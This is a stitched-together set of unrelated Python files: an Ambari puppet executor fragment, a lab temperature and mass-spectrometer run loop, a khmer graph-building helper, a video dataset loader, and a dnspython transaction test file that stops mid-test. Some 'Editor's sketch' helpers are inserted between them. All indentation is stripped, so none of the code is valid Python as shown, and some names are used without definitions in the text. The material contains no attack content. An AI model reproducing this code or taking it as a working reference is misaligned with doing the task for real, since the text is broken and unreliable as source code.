self.reposInstalled = False
def generate_repo_manifests(self, command, tmpDir, modulesdir, taskId):
# Hack to only create the repo files once
manifest_list = []
if not self.reposInstalled:
repoInstaller = RepoInstaller(command, tmpDir, modulesdir, taskId, self.config)
manifest_list = repoInstaller.generate_repo_manifests()
return manifest_list
def puppetCommand(self, sitepp):
modules = self.puppetModule
puppetcommand = [self.getPuppetBinary(), "apply", "--confdir=" + modules, "--detailed-exitcodes", sitepp]
return puppetcommand
def facterLib(self):
return self.facterInstall + "/lib/"
pass
def puppetLib(self):
return self.puppetInstall + "/lib"
pass
def condenseOutput(self, stdout, stderr, retcode):
grep = self.grep
if stderr == self.NO_ERROR:
result = grep.tail(stdout, grep.OUTPUT_LAST_LINES)
else:
result = grep.grep(stdout, "fail", grep.ERROR_LAST_LINES_BEFORE, grep.ERROR_LAST_LINES_AFTER)
if result is None: # Second try
result = grep.grep(stdout, "err", grep.ERROR_LAST_LINES_BEFORE, grep.ERROR_LAST_LINES_AFTER)
filteredresult = grep.filterMarkup(result)
return filteredresult
def isSuccessfull(self, returncode):
return not self.last_puppet_has_been_killed and (returncode == 0 or returncode == 2)
def run_manifest(self, command, file, tmpoutfile, tmperrfile):
result = {}
taskId = 0
if command.has_key("taskId"):
taskId = command['taskId']
puppetEnv = os.environ
#Install repos
repo_manifest_list = self.generate_repo_manifests(command, self.tmpDir, self.modulesdir, taskId)
puppetFiles = list(repo_manifest_list)
puppetFiles.append(file)
# Run all puppet commands: those from the manifest generator and those for repo installation.
# Outputs and errors are appended; the exit code is the maximum across all runs.
for puppetFile in puppetFiles:
self.runPuppetFile(puppetFile, result, puppetEnv, tmpoutfile, tmperrfile)
# If one of the puppet commands fails, stop and error out
if not self.isSuccessfull(result["exitcode"]):
break
if self.isSuccessfull(result["exitcode"]):
# All puppet runs succeeded, so mark the repos as installed
self.reposInstalled = True
logger.info("ExitCode : " + str(result["exitcode"]))
return result
def runCommand(self, command, tmpoutfile, tmperrfile):
taskId = 0
if command.has_key("taskId"):
taskId = command['taskId']
siteppFileName = os.path.join(self.tmpDir, "site-" + str(taskId) + ".pp")
generateManifest(command, siteppFileName, self.modulesdir, self.config)
result = self.run_manifest(command, siteppFileName, tmpoutfile, tmperrfile)
return result
def runPuppetFile(self, puppetFile, result, puppetEnv, tmpoutfile, tmperrfile):
""" Run the command and make sure the output gets propagated"""
puppetcommand = self.puppetCommand(puppetFile)
rubyLib = ""
if os.environ.has_key("RUBYLIB"):
rubyLib = os.environ["RUBYLIB"]
logger.debug("RUBYLIB from Env " + rubyLib)
if not (self.facterLib() in rubyLib):
rubyLib = rubyLib + ":" + self.facterLib()
if not (self.puppetLib() in rubyLib):
rubyLib = rubyLib + ":" + self.puppetLib()
tmpout = open(tmpoutfile, 'w')
tmperr = open(tmperrfile, 'w')
puppetEnv["RUBYLIB"] = rubyLib
puppetEnv = self.configureEnviron(puppetEnv)
logger.debug("Setting RUBYLIB as: " + rubyLib)
logger.info("Running command " + pprint.pformat(puppetcommand))
puppet = self.lauch_puppet_subprocess(puppetcommand, tmpout, tmperr, puppetEnv)
logger.debug("Launching watchdog thread")
self.event.clear()
self.last_puppet_has_been_killed = False
thread = Thread(target = self.puppet_watchdog_func, args = (puppet, ))
thread.start()
# Wait for the process to finish or be killed
puppet.communicate()
self.event.set()
thread.join()
# Building results
error = self.NO_ERROR
returncode = 0
if not self.isSuccessfull(puppet.returncode):
returncode = puppet.returncode
error = open(tmperrfile, 'r').read()
logging.error("Error running puppet: \n" + str(error))
pass
if self.last_puppet_has_been_killed:
error = str(error) + "\n Puppet has been killed due to timeout"
returncode = 999
if result.has_key("stderr"):
result["stderr"] = result["stderr"] + os.linesep + str(error)
else:
result["stderr"] = str(error)
puppetOutput = open(tmpoutfile, 'r').read()
logger.debug("Output from puppet :\n" + puppetOutput)
logger.info("Puppet exit code is " + str(returncode))
if result.has_key("exitcode"):
result["exitcode"] = max(returncode, result["exitcode"])
else:
result["exitcode"] = returncode
condensed = self.condenseOutput(puppetOutput, error, returncode)
if result.has_key("stdout"):
result["stdout"] = result["stdout"] + os.linesep + str(condensed)
else:
result["stdout"] = str(condensed)
return result
def lauch_puppet_subprocess(self, puppetcommand, tmpout, tmperr, puppetEnv):
"""
Creates a subprocess with the given parameters. This functionality lives in a
separate method to make unit testing possible.
"""
return subprocess.Popen(puppetcommand,
stdout=tmpout,
stderr=tmperr,
env=puppetEnv)
def puppet_watchdog_func(self, puppet):
self.event.wait(self.PUPPET_TIMEOUT_SECONDS)
if puppet.returncode is None:
logger.error("Task timed out and will be killed")
shell.kill_process_with_children(puppet.pid)
self.last_puppet_has_been_killed = True
pass
def main():
logging.basicConfig(level=logging.DEBUG)
#test code
jsonFile = open('test.json', 'r')
jsonStr = jsonFile.read()
# Below is for testing only.
puppetInstance = PuppetExecutor("/home/centos/ambari_repo_info/ambari-agent/src/main/puppet/",
"/usr/",
"/root/workspace/puppet-install/facter-1.6.10/",
"/tmp")
parsedJson = json.loads(jsonStr)
result = puppetInstance.runCommand(parsedJson, '/tmp/out.txt', '/tmp/err.txt')
logger.debug(result)
if __name__ == '__main__':
main()
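# Editor's sketch (not part of the original file): lauch_puppet_subprocess is
# kept as a separate method so unit tests can substitute a fake process instead
# of launching puppet; the fake class below is an assumption for illustration.
class _FakePuppetProcess:
    returncode = 0
    pid = 0
    def communicate(self):
        return None
def _example_stub_subprocess(executor):
    # Route the launcher to the fake so runPuppetFile only exercises its
    # result handling (exit code, stdout/stderr condensing).
    executor.lauch_puppet_subprocess = lambda cmd, out, err, env: _FakePuppetProcess()
    return executor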
|
Run.py
|
"""
"""
import time
import numpy as np
from threading import Thread
from TPD.MassSpec_Functions import thread_read_masses
from TPD.Eurotherm_Functions import thread_send_mV_setpoint,read_Temp_value
# from TPD.Gui import emergency_stop
from TPD.Header_info import write_data, header_info
import pyqtgraph as pg
from queue import Queue
import sys
import os
from PyQt5.QtWidgets import QMainWindow, QPushButton, QApplication
from pyqtgraph.Qt import QtCore, QtGui
def runme(iter_freq, mv_setpoints, time_array,list_of_masses, list_of_sensitivities, sendFreq, alpha, alpha_iter,
n, temp_plot_arr, T_array, mass_signals, setpoint_sending, temp_setpoints, curves, T_set_curve, T_read_curve,
controlObj, controlObj2, uti1, app, win1, win2, button, button_hold, button_hold_off, stop_button, hold_button, hold_off_button, save_path,
project_folder, experiment_name, hold_time=30):
def emergency_stop():
# stop increasing the temp and send a safe setpoint
# controlObj.write_sp(0.0)
# TODO add save data
# from TPD.Main import cum_time, T_array, mass_signals
controlObj.write_sp(-2.9)
controlObj.close_me()
controlObj2.close_me()
time.sleep(1)
# quit()
os.chdir(save_path)
os.makedirs(project_folder, exist_ok=True)
write_data(project_folder, experiment_name, cum_time, T_array, mass_signals)
sys.exit()
def hold_off():
time.sleep(hold_time)
controlObj.write_sp(-2.9)
controlObj.close_me()
controlObj2.close_me()
time.sleep(1)
# quit()
os.chdir(save_path)
os.makedirs(project_folder, exist_ok=True)
write_data(project_folder, experiment_name, cum_time, T_array, mass_signals)
sys.exit()
def hold_temperature():
time.sleep(hold_time)
button.clicked.connect(emergency_stop)
button_hold.clicked.connect(hold_temperature)
button_hold_off.clicked.connect(hold_off)
cum_time = 0
# proxy = QtGui.QGraphicsProxyWidget()
# button = QtGui.QPushButton('STOP')
# proxy.setWidget(button)
# stop_button = win2.addItem(proxy)
# button.clicked.connect(emergency_stop(controlObj))
queue = Queue()
# while iter_freq < len(mv_setpoints):
while alpha_iter < len(setpoint_sending):
start_alpha = time.time()
# append current time to the array.
time_array = np.append(time_array, time.time())
# Read time and temperature data
cum_time = np.cumsum(np.concatenate(([0], np.diff(time_array))))
t = Thread(target=thread_read_masses, args=(uti1, list_of_masses, list_of_sensitivities, queue))
# t = Thread(target=thread_read_masses, args=(list_of_masses, list_of_sensitivities, mass_signals))
# cProfile.run('t.start()')
t.start()
# t = cProfile.run('thread_profile(list_of_masses, list_of_sensitivities, queue)')
# print(setpoint_sending[alpha_iter])
iter_freq = thread_send_mV_setpoint(iter_freq, mv_setpoints, setpoint_sending[alpha_iter], sendFreq, alpha,
controlObj, t)
t.join()
response = queue.get()
# print(alpha_iter)
alpha_iter += 1
try:
# controlObj.write_sp(mv_setpoints[iter_freq])
if alpha_iter*n <= len(temp_setpoints) and alpha_iter != 0:
# temp_plot_arr = np.append(temp_plot_arr, temp_setpoints[multiple*i])
temp_plot_arr = np.append(temp_plot_arr, temp_setpoints[iter_freq])
else:
temp_plot_arr = np.append(temp_plot_arr, temp_setpoints[0])
except IndexError as e:
print(e)
controlObj.write_sp(mv_setpoints[0])
try:
T_set_curve.setData(x=cum_time[:len(temp_plot_arr)], y=temp_plot_arr, pen='r', name='setpoint')
except:
T_set_curve.setData(x=cum_time, y=temp_plot_arr[:len(cum_time)], pen='r', name='setpoint')
# TODO read_Temp_value is a duplicate of Eurotherm.read_temp() fcn
T_array = np.append(T_array, read_Temp_value(controlObj, controlObj2))
T_read_curve.setData(x=cum_time, y=T_array, pen='g', name='readout')
# TODO add masses
if len(list_of_masses) > 0 and response is not None:
for i, j, k in zip(response, list_of_masses, curves):
mass_signals['mass' + str(j)] = np.append(mass_signals['mass' + str(j)], i)
if alpha_iter % 4 == 0:
k.setData(x=T_array, y=mass_signals['mass{0}'.format(str(j))], pen='g')
# pg.QtGui.QApplication.processEvents()
# for mass, mass_plot in zip(list_of_masses, curves):
# mass_plot.setData(x=T_array, y=mass_signals['mass{0}'.format(mass)], pen='g')
# T_set_curve.setData(x=cum_time,y=temp_plot_arr[:len(cum_time)], pen='r',name='setpoint')
if alpha_iter % 4 == 0:
pg.QtGui.QApplication.processEvents()
# remove the break below if you want to keep logging during cooldown
if iter_freq == len(mv_setpoints):
break
print('total iter time = ' + str(time.time() - start_alpha))
return T_array, cum_time, start_alpha, time_array, mass_signals
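# Editor's sketch (not part of the original script): the elapsed-time array in
# runme() is built as the cumulative sum of the differences between absolute
# timestamps, prepended with 0, i.e. seconds elapsed since the first sample.
def _example_elapsed_time():
    stamps = np.array([100.0, 100.5, 101.5, 103.0])
    cum_time = np.cumsum(np.concatenate(([0], np.diff(stamps))))
    assert np.allclose(cum_time, [0.0, 0.5, 1.5, 3.0])
    return cum_time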
|
functions.py
|
#
# This file is part of khmer, http://github.com/ged-lab/khmer/, and is
# Copyright (C) Michigan State University, 2009-2015. It is licensed under
# the three-clause BSD license; see doc/LICENSE.txt.
# Contact: khmer-project@idyll.org
#
# pylint: disable=missing-docstring
import threading
import khmer.utils
def build_graph(ifilenames, graph, num_threads=1, tags=False):
if tags:
eat = graph.consume_fasta_and_tag_with_reads_parser
else:
eat = graph.consume_fasta_with_reads_parser
for _, ifile in enumerate(ifilenames):
rparser = khmer.ReadParser(ifile)
threads = []
for _ in range(num_threads):
cur_thread = threading.Thread(target=eat, args=(rparser,))
threads.append(cur_thread)
cur_thread.start()
for thread in threads:
thread.join()
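# Editor's sketch (not part of the original module): build_graph above starts
# num_threads threads per input file, all consuming reads from one shared
# ReadParser. The same fan-out/join pattern with a plain callable, for
# illustration only:
def _example_fan_out(consume_shared, shared_source, num_threads=2):
    workers = [threading.Thread(target=consume_shared, args=(shared_source,))
               for _ in range(num_threads)]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()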
|
data.py
|
import os
import cv2
import random
import tempfile
import numpy as np
from Queue import Queue
from threading import Thread
from .base_provider import VideosDataset, DataProvider
class Data(VideosDataset):
def __init__(self, name, paths, normalization, sequence_length,
crop_size, num_classes, queue_size):
"""
Args:
name: str, name of the data (train, test or validation)
paths: list, list of string that have the video path and label
information
sequence_length: video clip length
crop_size: `tuple`, image resize size (width, height)
normalization: `str` or None
None: no normalization
divide_255: divide all pixels by 255
divide_256: divide all pixels by 256
num_classes: `integer`, number of classes that the dataset has
queue_size: `integer`, data queue size
"""
self.name = name
self.paths = paths
self.normalization = normalization
self.sequence_length = sequence_length
self.crop_size = crop_size
self.num_classes = num_classes
self.queue = DataQueue(name, queue_size)
self.examples = None
self._start_data_thread()
def get_frames_data(self, filename, num_frames_per_clip=16):
''' Given a directory containing extracted frames, return a video clip of
(num_frames_per_clip) consecutive frames as a list of np arrays
Args
num_frames_per_clip: sequence_length of the video clip
Returns
video: numpy, video clip with shape
[sequence_length, width, height, channels]
'''
video = []
s_index = 0
for parent, dirnames, filenames in os.walk(filename):
if(len(filenames) < num_frames_per_clip):
return None
suffix = filenames[0].split('.', 1)[1]
filenames_int = [int(i.split('.', 1)[0]) for i in filenames]
filenames_int = sorted(filenames_int)
s_index = random.randint(0, len(filenames) - num_frames_per_clip)
for i in range(s_index, s_index + num_frames_per_clip):
image_name = str(filename) + '/' + str(filenames_int[i]) + '.' + suffix
# print image_name
img = cv2.imread(image_name)
img = cv2.resize(img, self.crop_size)
if self.normalization:
img_data = self.normalize_image(img, self.normalization)
video.append(img_data)
return video
def extract_video_data(self):
''' Single thread to extract video and label information from the dataset
'''
# Generate one random index and extract the corresponding video clip
while True:
index = random.randint(0, len(self.paths)-1)
video_path, label = self.paths[index].strip('\n').split()
video = self.get_frames_data(video_path, self.sequence_length)
if video is not None and len(video) == self.sequence_length:
# Put the video into the queue
video = np.array(video)
label = np.array(int(label))
self.queue.put((video, label))
def _start_data_thread(self):
print("Start thread: %s data preparation ..." % self.name)
self.worker = Thread(target=self.extract_video_data)
self.worker.setDaemon(True)
self.worker.start()
@property
def num_examples(self):
if not self.examples:
# calculate the number of examples
total = 0
for line in self.paths:
video_path, _ = line.strip('\n').split()
for root, dirs, files in os.walk(video_path):
total += len(files)
self.examples = total / self.sequence_length
return self.examples
def next_batch(self, batch_size):
''' Get the next batches of the dataset
Args
batch_size: video batch size
Returns
videos: numpy, shape
[batch_size, sequence_length, width, height, channels]
labels: numpy
[batch_size, num_classes]
'''
videos, labels = self.queue.get(batch_size)
videos = np.array(videos)
labels = np.array(labels)
labels = self.labels_to_one_hot(labels, self.num_classes)
return videos, labels
class DataQueue():
def __init__(self, name, maximum_item, block=True):
"""
Args
name: str, data type name (train, validation or test)
maximum_item: integer, maximum item that this queue can store
block: boolean, whether put/get should block when the queue is
full or empty
"""
# Keep the backing attributes private so the read-only properties below
# can expose them without recursing.
self._name = name
self.block = block
self.maximum_item = maximum_item
self._queue = Queue(maximum_item)
@property
def queue(self):
return self._queue
@property
def name(self):
return self._name
def put(self, data):
self.queue.put(data, self.block)
def get(self, batch_size):
'''
Args:
batch_size: integer, the number of items to get from the queue
Returns:
videos: list, list of numpy data with shape
[sequence_length, width, height, channels]
labels: list, list of integer number
'''
videos = []
labels = []
for i in range(batch_size):
video, label = self.queue.get(self.block)
videos.append(video)
labels.append(label)
return videos, labels
class DataProvider(DataProvider):
def __init__(self, num_classes, validation_set=None, test=False,
validation_split=None, normalization=None, crop_size=(64,64),
sequence_length=16, train_queue=None, valid_queue=None,
test_queue=None, train=False, queue_size=300, **kwargs):
"""
Args:
num_classes: the number of the classes
validation_set: `bool`.
validation_split: `int` or None
int: that many examples from the `train set` will be held out
as the `validation set`.
None: if `validation_set` is True, the `validation set` will be
a copy of the `test set`.
normalization: `str` or None
None: no normalization
divide_255: divide all pixels by 255
divide_256: divide all pixels by 256
sequence_length: `integer`, video clip length
crop_size: `tuple`, the size that you want to reshape the images, (width, height)
train: `boolean`, whether we need the training queue or not
test: `boolean`, whether we need the testing queue or not
queue_size: `integer`, data queue size, default is 300
"""
self._num_classes = num_classes
self._sequence_length = sequence_length
self._crop_size = crop_size
train_videos_labels = self.get_videos_labels_lines(
'data_providers/train.list')
test_videos_labels = self.get_videos_labels_lines(
'data_providers/test.list')
if validation_set and validation_split:
random.shuffle(train_videos_labels)
valid_videos_labels = train_videos_labels[:validation_split]
train_videos_labels = train_videos_labels[validation_split:]
self.validation = Data('validation', valid_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
if train:
self.train = Data('train', train_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
if test:
self.test = Data('test', test_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
if validation_set and not validation_split:
self.validation = Data('validation', test_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
def get_videos_labels_lines(self, path):
# Open the file according to the filename
lines = open(path, 'r')
lines = list(lines)
return lines
@property
def data_shape(self):
return (self._sequence_length, self._crop_size[1], self._crop_size[0], 3)
@property
def n_classes(self):
return self._num_classes
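# Editor's sketch (not part of the original module): a minimal, self-contained
# demonstration of the DataQueue defined above. Data and DataProvider
# additionally need the data_providers/*.list files and extracted frame
# directories, so they are not exercised here.
def _example_data_queue():
    q = DataQueue('demo', maximum_item=4)
    q.put((np.zeros((16, 64, 64, 3)), 1))
    videos, labels = q.get(batch_size=1)
    assert len(videos) == 1 and labels[0] == 1
    return videos, labels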
|
test_transaction.py
|
# Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
import time
import pytest
import dns.name
import dns.rdataclass
import dns.rdatatype
import dns.rdataset
import dns.rrset
import dns.transaction
import dns.versioned
import dns.zone
class DB(dns.transaction.TransactionManager):
def __init__(self):
self.rdatasets = {}
def reader(self):
return Transaction(self, False, True)
def writer(self, replacement=False):
return Transaction(self, replacement, False)
def origin_information(self):
return (dns.name.from_text('example'), True, dns.name.empty)
def get_class(self):
return dns.rdataclass.IN
class Transaction(dns.transaction.Transaction):
def __init__(self, db, replacement, read_only):
super().__init__(db, replacement, read_only)
self.rdatasets = {}
if not replacement:
self.rdatasets.update(db.rdatasets)
@property
def db(self):
return self.manager
def _get_rdataset(self, name, rdtype, covers):
return self.rdatasets.get((name, rdtype, covers))
def _put_rdataset(self, name, rdataset):
self.rdatasets[(name, rdataset.rdtype, rdataset.covers)] = rdataset
def _delete_name(self, name):
remove = []
for key in self.rdatasets.keys():
if key[0] == name:
remove.append(key)
if len(remove) > 0:
for key in remove:
del self.rdatasets[key]
def _delete_rdataset(self, name, rdtype, covers):
del self.rdatasets[(name, rdtype, covers)]
def _name_exists(self, name):
for key in self.rdatasets.keys():
if key[0] == name:
return True
return False
def _changed(self):
if self.read_only:
return False
else:
return len(self.rdatasets) > 0
def _end_transaction(self, commit):
if commit:
self.db.rdatasets = self.rdatasets
def _set_origin(self, origin):
pass
@pytest.fixture
def db():
db = DB()
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'content')
db.rdatasets[(rrset.name, rrset.rdtype, 0)] = rrset
return db
def test_basic(db):
# successful txn
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
assert txn.name_exists(rrset.name)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset
# rollback
with pytest.raises(Exception):
with db.writer() as txn:
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.add(rrset2)
raise Exception()
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset
with db.writer() as txn:
txn.delete(rrset.name)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) \
is None
def test_get(db):
with db.writer() as txn:
content = dns.name.from_text('content', None)
rdataset = txn.get(content, dns.rdatatype.TXT)
assert rdataset is not None
assert rdataset[0].strings == (b'content',)
assert isinstance(rdataset, dns.rdataset.ImmutableRdataset)
def test_add(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.add(rrset2)
expected = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2',
'10.0.0.3', '10.0.0.4')
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
expected
def test_replacement(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.replace(rrset2)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset2
def test_delete(db):
with db.writer() as txn:
txn.delete(dns.name.from_text('nonexistent', None))
content = dns.name.from_text('content', None)
content2 = dns.name.from_text('content2', None)
txn.delete(content)
assert not txn.name_exists(content)
txn.delete(content2, dns.rdatatype.TXT)
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'new-content')
txn.add(rrset)
assert txn.name_exists(content)
txn.delete(content, dns.rdatatype.TXT)
assert not txn.name_exists(content)
rrset = dns.rrset.from_text('content2', 300, 'in', 'txt', 'new-content')
txn.delete(rrset)
content_keys = [k for k in db.rdatasets if k[0] == content]
assert len(content_keys) == 0
def test_delete_exact(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'bad-content')
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
rrset = dns.rrset.from_text('content2', 300, 'in', 'txt', 'bad-content')
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name, dns.rdatatype.TXT)
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'content')
txn.delete_exact(rrset)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) \
is None
def test_parameter_forms(db):
with db.writer() as txn:
foo = dns.name.from_text('foo', None)
rdataset = dns.rdataset.from_text('in', 'a', 300,
'10.0.0.1', '10.0.0.2')
rdata1 = dns.rdata.from_text('in', 'a', '10.0.0.3')
rdata2 = dns.rdata.from_text('in', 'a', '10.0.0.4')
txn.add(foo, rdataset)
txn.add(foo, 100, rdata1)
txn.add(foo, 30, rdata2)
expected = dns.rrset.from_text('foo', 30, 'in', 'a',
'10.0.0.1', '10.0.0.2',
'10.0.0.3', '10.0.0.4')
assert db.rdatasets[(foo, rdataset.rdtype, 0)] == \
expected
with db.writer() as txn:
txn.delete(foo, rdataset)
txn.delete(foo, rdata1)
txn.delete(foo, rdata2)
assert db.rdatasets.get((foo, rdataset.rdtype, 0)) \
is None
def test_bad_parameters(db):
with db.writer() as txn:
with pytest.raises(TypeError):
txn.add(1)
with pytest.raises(TypeError):
rrset = dns.rrset.from_text('bar', 300, 'in', 'txt', 'bar')
txn.add(rrset, 1)
with pytest.raises(ValueError):
foo = dns.name.from_text('foo', None)
rdata = dns.rdata.from_text('in', 'a', '10.0.0.3')
txn.add(foo, 0x100000000, rdata)
with pytest.raises(TypeError):
txn.add(foo)
with pytest.raises(TypeError):
txn.add()
with pytest.raises(TypeError):
txn.add(foo, 300)
with pytest.raises(TypeError):
txn.add(foo, 300, 'hi')
with pytest.raises(TypeError):
txn.add(foo, 'hi')
with pytest.raises(TypeError):
txn.delete()
with pytest.raises(TypeError):
txn.delete(1)
def test_cannot_store_non_origin_soa(db):
with pytest.raises(ValueError):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'SOA',
'. . 1 2 3 4 5')
txn.add(rrset)
example_text = """$TTL 3600
$ORIGIN example.
@ soa foo bar 1 2 3 4 5
@ ns ns1
@ ns ns2
ns1 a 10.0.0.1
ns2 a 10.0.0.2
$TTL 300
$ORIGIN foo.example.
bar mx 0 blaz
"""
example_text_output = """@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
@ 3600 IN NS ns3
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
ns3 3600 IN A 10.0.0.3
"""
@pytest.fixture(params=[dns.zone.Zone, dns.versioned.Zone])
def zone(request):
return dns.zone.from_text(example_text, zone_factory=request.param)
def test_zone_basic(zone):
with zone.writer() as txn:
txn.delete(dns.name.from_text('bar.foo', None))
rd = dns.rdata.from_text('in', 'ns', 'ns3')
txn.add(dns.name.empty, 3600, rd)
rd = dns.rdata.from_text('in', 'a', '10.0.0.3')
txn.add(dns.name.from_text('ns3', None), 3600, rd)
output = zone.to_text()
assert output == example_text_output
def test_explicit_rollback_and_commit(zone):
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
txn.rollback()
assert zone.get_node('bar.foo') is not None
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
txn.commit()
assert zone.get_node('bar.foo') is None
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete(dns.name.from_text('bar.foo', None))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.add('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.replace('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.reader() as txn:
txn.rollback()
txn.get('bar.foo', 'in', 'mx')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete_exact('bar.foo')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.name_exists('bar.foo')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.update_serial()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.changed()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.rollback()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.commit()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
for rdataset in txn:
pass
def test_zone_changed(zone):
# Read-only is not changed!
with zone.reader() as txn:
assert not txn.changed()
# delete an existing name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
assert txn.changed()
# delete a nonexistent name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('unknown.bar.foo', None))
assert not txn.changed()
# delete a nonexistent rdataset from an extant node
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None), 'txt')
assert not txn.changed()
# add an rdataset to an extant Node
with zone.writer() as txn:
assert not txn.changed()
txn.add('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
assert txn.changed()
# add an rdataset to a nonexistent Node
with zone.writer() as txn:
assert not txn.changed()
txn.add('foo.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
assert txn.changed()
def test_zone_base_layer(zone):
with zone.writer() as txn:
# Get a set from the zone layer
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2')
assert rdataset == expected
def test_zone_transaction_layer(zone):
with zone.writer() as txn:
# Make a change
rd = dns.rdata.from_text('in', 'ns', 'ns3')
txn.add(dns.name.empty, 3600, rd)
# Get a set from the transaction layer
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2', 'ns3')
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
assert rdataset == expected
assert txn.name_exists(dns.name.empty)
ns1 = dns.name.from_text('ns1', None)
assert txn.name_exists(ns1)
ns99 = dns.name.from_text('ns99', None)
assert not txn.name_exists(ns99)
def test_zone_add_and_delete(zone):
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
a100 = dns.name.from_text('a100', None)
a101 = dns.name.from_text('a101', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
txn.delete(a99, dns.rdatatype.A)
txn.delete(a100, dns.rdatatype.A)
txn.delete(a101)
assert not txn.name_exists(a99)
assert not txn.name_exists(a100)
assert not txn.name_exists(a101)
ns1 = dns.name.from_text('ns1', None)
txn.delete(ns1, dns.rdatatype.A)
assert not txn.name_exists(ns1)
with zone.writer() as txn:
txn.add(a99, rds)
txn.delete(a99)
assert not txn.name_exists(a99)
with zone.writer() as txn:
txn.add(a100, rds)
txn.delete(a99)
assert not txn.name_exists(a99)
assert txn.name_exists(a100)
def test_write_after_rollback(zone):
with pytest.raises(ExpectedException):
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
raise ExpectedException
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.99.99.99')
txn.add(a99, rds)
assert zone.get_rdataset('a99', 'a') == rds
def test_zone_get_deleted(zone):
with zone.writer() as txn:
ns1 = dns.name.from_text('ns1', None)
assert txn.get(ns1, dns.rdatatype.A) is not None
txn.delete(ns1)
assert txn.get(ns1, dns.rdatatype.A) is None
ns2 = dns.name.from_text('ns2', None)
txn.delete(ns2, dns.rdatatype.A)
assert txn.get(ns2, dns.rdatatype.A) is None
def test_zone_bad_class(zone):
with zone.writer() as txn:
rds = dns.rdataset.from_text('ch', 'ns', 300, 'ns1', 'ns2')
with pytest.raises(ValueError):
txn.add(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.replace(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.delete(dns.name.empty, rds)
def test_update_serial(zone):
# basic
with zone.writer() as txn:
txn.update_serial()
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 2
# max
with zone.writer() as txn:
txn.update_serial(0xffffffff, False)
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 0xffffffff
# wraparound to 1
with zone.writer() as txn:
